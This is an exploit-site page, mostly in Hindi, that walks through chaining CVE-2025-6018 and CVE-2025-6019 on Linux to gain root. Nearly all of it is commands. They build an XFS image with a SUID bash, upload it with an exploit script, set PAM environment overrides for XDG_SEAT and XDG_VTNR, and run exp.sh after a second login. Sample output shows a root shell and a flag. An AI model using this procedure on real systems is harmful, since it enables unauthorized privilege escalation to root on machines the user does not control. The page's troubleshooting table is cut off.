## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MUYUANLOVE-CVE-2025-6018-CVE-2025-6019-PRIVILEGE-ESCALATION-EXPLOIT
# CVE-2025-6018 + CVE-2025-6019 विशेषाधिकार वृद्धि गाइड
中文
## 📋 त्वरित शोषण चरण
### चरण 1: XFS इमेज तैयार करें (स्थानीय मशीन)
root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Verify (should show 300M)
ls -lh xfs.image
* * *
### चरण 2: टारगेट पर फ़ाइलें अपलोड करें
root@kitploit:~
# Upload exploit script and image
scp exp.sh some-email@example.com:~/
scp xfs.image some-email@example.com:~/
* * *
### चरण 3: पहला लॉगिन - PAM कॉन्फ़िगर करें
root@kitploit:~
# SSH login to target
ssh some-email@example.com
# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# Verify configuration
cat ~/.pam_environment
# 🔥 Critical: Logout (to activate PAM config)
exit
* * *
### चरण 4: दूसरा लॉगिन - विशेषाधिकार वृद्धि निष्पादित करें
root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh some-email@example.com
# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Execute privilege escalation script
bash exp.sh
* * *
## ✅ सफलता संकेतक
यदि शोषण सफल होता है, तो आपको यह देखना चाहिए:
root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!
════════════════════════════════════════════════════════════
║ ROOT FLAG ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
* * *
## 🔧 समस्या निवारण
समस्या| समाधान
---|---
`CanReboot` लौटाता है
* * *
## 📌 मुख्य बिंदु
* ✅ **लॉगआउट और फिर से लॉगिन करना आवश्यक है** : PAM कॉन्फ़िग केवल नए सत्रों में प्रभावी होता है
* ✅ **CanReboot सत्यापित करें** : स्क्रिप्ट चलाने से पहले पुष्टि करें कि यह `('yes',)` लौटाता है
* ✅ **SSH लॉगिन का उपयोग करें** : `ssh -t user@host "cmd"` शैली निष्पादन का उपयोग न करें
* * *
## 🐱 बिल्ली संरक्षक
**यदि यह विफल होता है, तो सुनिश्चित करें कि हर चरण सख्ती से क्रम में निष्पादित किया गया है!**